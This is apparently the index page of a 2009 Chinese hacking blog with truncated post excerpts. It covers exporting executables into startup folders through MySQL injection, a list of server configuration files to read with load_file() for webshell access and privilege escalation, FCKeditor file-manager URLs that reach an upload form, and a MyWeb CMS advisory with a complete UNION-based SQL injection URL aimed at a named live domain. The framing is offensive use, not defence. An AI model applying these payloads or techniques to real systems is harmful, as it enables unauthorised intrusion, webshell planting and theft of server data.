greyair's blog

文章列表

神一样的科学家

2009-11-20 07:24

尼古拉·特斯拉

在某人博客上看到的。。。百度搜索了一下。

果然是神一样的科学家。膜拜中。。。

类别：乱七八糟 | 评论(0) | 浏览()

巧下整站源代码

2009-11-19 06:26

阅读全文>>

类别：技术文章 | 评论(0) | 浏览()

mysql注入中导出可执行文件至启动项原理及实例(图)

2009-11-17 22:10

前言
之前在《mysql下读取文件的几种方式及应用》一文中提到在mysql注入中理论上应该可以导出可执行二进制文件到启动项的说法，现给出原理及实例供大家参考。
MYSQL注入中导出文件需满足的条件大家都知道，就不多说了，要导出可执行二进制文件还需注入点必须存在二进制编码格式数据类型的字段（如BLOB或LONGBLOB数据类型）。要导出可执行bat文件对字段的数据类型没有要求。其他一些附加限制条件依环境而定。
在注入页面无法爆出物理路径的情况下，如果满足上述条件

阅读全文>>

类别：技术文章 | 评论(0) | 浏览()

MYSQL注入中load_file()函数的进一步应用更新

2009-11-17 06:06

MYSQL注入中，load_file()函数在获得webshell以及提权过程中起着十分重要的作用，常被用来读取各种配置文件，如：
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/sysconfi

阅读全文>>

类别：技术文章 | 评论(0) | 浏览()

Fckeditor的一些漏洞总结

2009-11-17 05:35

ewebeditor.asp?action=stylepreview&id=14

Fckeditor版本多..支持很多语言..所以本文不针对任何版本或者什么语言.只讲利用方法

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.Asp

当你知道fckeditor目录时..你输入以上地址..就会看到有个上传的地方..如图所示:

阅读全文>>

类别：技术文章 | 评论(0) | 浏览()

网站智能管理系统web_content.php页面注入漏洞

2009-11-13 00:27

影响版本：
MyWeb 5.0
MyWeb 7.0

漏洞描述：
在”include”目录下，文件web_content.php文件对变量Id提交的参数没有过滤，导致存在注入漏洞。
http://www.nuanyue.com/include/web_content.php?id=80 and 1=2 union select 1,2,concat(user()),4,5,6,7,8,9,10,11,12,13–

类别：漏洞分析 | 评论(0) | 浏览()

节日报告

2009-11-11 18:53